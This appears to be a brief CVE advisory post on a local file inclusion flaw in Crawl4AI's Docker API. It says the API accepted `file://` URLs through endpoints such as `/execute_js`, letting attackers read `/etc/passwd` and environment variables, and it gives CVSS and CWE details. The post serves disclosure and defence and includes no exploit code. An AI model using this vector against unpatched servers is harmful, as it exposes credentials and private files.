Crawl4AI: When Web Scrapers Become File Servers
Jan 17, 2026·5 min read·8 visits
Executive Summary (TL;DR)
The Crawl4AI Docker API accepted any URL scheme, including `file://`. Attackers could use endpoints like `/execute_js` to read sensitive local files (like `/etc/passwd` or environment variables) simply by asking the crawler to 'visit' them. This is a classic Local File Inclusion (LFI) vulnerability fixed in version 0.8.0.
Crawl4AI, a popular tool for making web content LLM-friendly, inadvertently exposed a massive hole in its Docker API. By failing to validate URL schemes, it allowed unauthenticated attackers to use the `file://` protocol to read local files from the server, turning a useful scraper into a highly effective data exfiltration tool.
Official Patches
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:NAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
crawl4ai unclecode | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| Attack Vector | Network (API) |
| CVSS | 8.6 (High) |
| CWE | CWE-22 (Path Traversal) |
| Privileges | None (Unauthenticated) |
| Impact | High Confidentiality (File Read) |
| Exploit Status | Functional PoC Available |
MITRE ATT&CK Mapping
The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Known Exploits & Detection
Vulnerability Timeline
Subscribe to updates
Get the latest CVE analysis reports delivered to your inbox.